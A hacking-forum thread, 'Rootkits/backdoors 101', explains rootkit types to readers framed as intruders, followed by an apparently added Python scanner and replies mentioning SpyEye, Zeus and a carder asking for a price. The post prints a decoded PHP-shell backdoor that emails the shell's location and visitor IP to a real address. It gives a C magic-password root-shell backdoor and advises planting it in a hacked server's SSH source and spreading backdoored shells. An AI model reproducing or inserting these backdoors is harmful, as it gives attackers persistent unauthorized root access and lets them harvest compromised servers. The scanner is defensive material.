Old 27-07-2011, 02:26 PM   #1
KNS
Member
 
Join Date: Jul 2011
Posts: 34
Reputation: 9
Rootkits/backdoors 101

Title: Rootkits/backdoors 101
Author: KNS

I. What is a rootkit?

A rootkit is software that enables continued privileged access to a computer while actively hiding its presence from administrators by subverting standard operating system functionality or other applications (backdoor). - Wikipedia

1. What are rootkits useful for?
After getting access to a system and escalating your privileges to root, it would be nice to have a backdoor on that server, right? Imagine you spend a lot of hours trying to get in and twice that amount of time to get root; the next day the administrators find out and patch everything, and then you are basically fucked. To prevent this from happening, rootkits are extremely useful, but they are also easily detected by rootkit hunters (anti-backdoor software).

2. Types of rootkits
There are at least five types of rootkit, ranging from those at the lowest level in firmware (with the highest privileges), through to the least privileged user-based variants that operate in Ring 3. Hybrid combinations of these may occur spanning, for example, user mode and kernel mode.

(Note that Ring ‑1 is not shown in image below)


2.1 User-mode
User-mode rootkits run in Ring 3, along with other applications as user, rather than as low-level system processes. They have a number of possible installation vectors to intercept and modify the standard behavior of application programming interfaces (APIs). Some inject a dynamically-linked library (such as a .DLL file on Windows, or a .dylib file on Mac OS X) into other processes, and are thereby able to execute inside any target process to spoof it; others with sufficient privileges simply overwrite the memory of a target application.

2.2 Kernel mode
Kernel-mode rootkits run with the highest operating system privileges (Ring 0) by adding code or replacing portions of the core operating system, including both the kernel and associated device drivers. Most operating systems support kernel-mode device drivers, which execute with the same privileges as the operating system itself. As such, many kernel-mode rootkits are developed as device drivers or loadable modules, such as loadable kernel modules in Linux or device drivers in Microsoft Windows. This class of rootkit has unrestricted security access, but is more difficult to write.

2.3 Bootkits
A kernel-mode rootkit variant called a bootkit is used predominantly to attack full disk encryption systems, for example as in the "Evil Maid Attack", in which a bootkit replaces the legitimate boot loader with one controlled by an attacker; typically the malware loader persists through the transition to protected mode when the kernel has loaded. For example, the "Stoned Bootkit" subverts the system by using a compromised boot loader to intercept encryption keys and passwords.[38] More recently, the Alureon rootkit has successfully subverted the requirement for 64-bit kernel-mode driver signing in Windows 7 by modifying the master boot record.

2.4 Hypervisor level
Rootkits have been created as Type II Hypervisors in academia as proofs of concept. By exploiting hardware virtualization features such as Intel VT or AMD-V, this type of rootkit runs in Ring -1 and hosts the target operating system as a virtual machine, thereby enabling the rootkit to intercept hardware calls made by the original operating system. Unlike normal hypervisors, they do not have to load before the operating system, but can load into an operating system before promoting it into a virtual machine. A hypervisor rootkit does not have to make any modifications to the kernel of the target to subvert it; however, that does not mean that it cannot be detected by the guest operating system. For example, timing differences may be detectable in CPU instructions.

2.5 Hardware/Firmware
A firmware rootkit uses device or platform firmware to create a persistent malware image in hardware, such as a network card, hard drive, or the system BIOS. The rootkit hides in firmware, because firmware is not usually inspected for code integrity. John Heasman demonstrated the viability of firmware rootkits in both ACPI firmware routines[44] and in a PCI expansion card ROM.

2.6 PHP backdoor
There are a lot of PHP backdoors, mainly planted into "PHP shells" used by hackers like us (c99, r57 etc.). Let's examine the following "legitimate PHP shell":
Code:
http://pastebin.com/raw.php?i=tUCqQpx9
If you aren't skilled in PHP, you can do "a basic brief" over the PHP file; it doesn't take a genius, really. You scroll down and scroll and scroll... and at line 399 you find something... a base64 encoded string. A quick Google query "online base64 decoder" and we have ourselves somewhere to decode that string (http://www.opinionatedgeek.com/dotne.../base64decode/). So we input:
The decoded output is:

Code:
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "Fx29Shell http://$target by $visitor";
  $body    = "Bug: $target by $visitor<br>";
  if (!empty($web)) { @mail("feelcomz@gmail.com",$judul,$body); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);
What do we have here? "feelcomz@gmail.com" receives an email once someone enters his shell; he gets the IP and the location of the shell. Now isn't that a comfortable backdoor? Instead of going to hack websites by yourself, you backdoor one, try to popularize it in some way, and you have a good "income" of shells.

2.7 Specific case for C programs
For C programs (same example as in the proftpd 1.3.3c backdoor that was placed; I recommend you analyze it):
Code:
if (strcmp(target, "iwantroot") == 0) { setuid(0); setgid(0);system("/bin/sh;/sbin/sh"); }
It is good to use it after you have hacked a server and gained root access: input this into their SSH src and you have a nice backdoor.

II. Reference/Thanks to
Wikipedia
KNS is offline
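A defender's counterpart to the walkthroughs in 2.6 and 2.7, as an added Python example that is not part of the original post: it decodes long base64 literals found in PHP source and flags those whose plaintext mails out server details, and it flags a hard-coded strcmp secret in C source when setuid(0)/setgid(0)/system( sits within a few lines of it. The sample inputs are constructed here, and the mail address in them is a placeholder.

```python
import base64
import re

# Long base64-looking string literal inside PHP source (the hidden blob in 2.6).
B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{40,}={0,2})["\']')
# Calls a decoded blob should not be making from a "utility" script.
DECODED_INDICATORS = ("mail(", "eval(", "system(", "$_SERVER[", "$_COOKIE[", "REMOTE_ADDR")
# C: strcmp against a hard-coded secret (the 2.7 pattern), checked near setuid(0)/system().
C_MAGIC_CMP = re.compile(r'strcmp\s*\(\s*\w+\s*,\s*"([^"]+)"\s*\)\s*==\s*0')
C_PRIV = re.compile(r'\b(setuid\s*\(\s*0\s*\)|setgid\s*\(\s*0\s*\)|system\s*\()')

def scan_php(src):
    """Decode every long base64 literal; report those whose plaintext calls out."""
    findings = []
    for m in B64_LITERAL.finditer(src):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError: not really base64
            continue
        hits = [ind for ind in DECODED_INDICATORS if ind in decoded]
        if hits:
            line = src.count("\n", 0, m.start()) + 1
            findings.append({"line": line, "indicators": hits, "decoded": decoded})
    return findings

def scan_c(src, window=4):
    """Flag a strcmp secret when setuid(0)/setgid(0)/system( sits within `window` lines."""
    findings = []
    lines = src.splitlines()
    for i, line in enumerate(lines):
        m = C_MAGIC_CMP.search(line)
        if m and C_PRIV.search("\n".join(lines[i:i + window])):
            findings.append({"line": i + 1, "literal": m.group(1)})
    return findings

# Constructed samples (not the page's files). The address is a placeholder.
PAYLOAD = '@mail("attacker@example.invalid","shell at ".$_SERVER["HTTP_HOST"],$_SERVER["REMOTE_ADDR"]);'
SAMPLE_PHP = '<?php\n$x = "' + base64.b64encode(PAYLOAD.encode()).decode() + '";\neval(base64_decode($x));\n'
SAMPLE_CLEAN = '<?php\n$h = "' + "0" * 64 + '";  // a hash-like literal, decodes to noise\n'
SAMPLE_C = '''static int check_auth(const char *target) {
  if (strcmp(target, "iwantroot") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
  return 0;
}'''

if __name__ == "__main__":
    for f in scan_php(SAMPLE_PHP) + scan_c(SAMPLE_C):
        print(f)
```

A hash-like 64-character hex literal passes the base64 regex but decodes to noise, so it is not reported; only blobs whose plaintext contains one of the listed calls are.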
Old 24-07-2012, 08:21 AM   #2
developer
RIPPER
 
Join Date: Jul 2012
Posts: 80
Reputation: 5

Quote:
Originally Posted by KNS
Title: Rootkits/backdoors 101
Author: KNS
This is interesting, thanks.
developer is offline
Old 06-10-2012, 03:10 AM   #3
destractions
BANNED
 
Join Date: Sep 2012
Location: Information
Posts: 27
Reputation: -1

I use backdoors; SpyEye and Zeus do perfect jobs.
destractions is offline
Old 20-10-2012, 06:16 AM   #4
2012CarderPro
BANNED
 
Join Date: Oct 2012
Posts: 20
Reputation: -1

What about a private product? Price please.
2012CarderPro is offline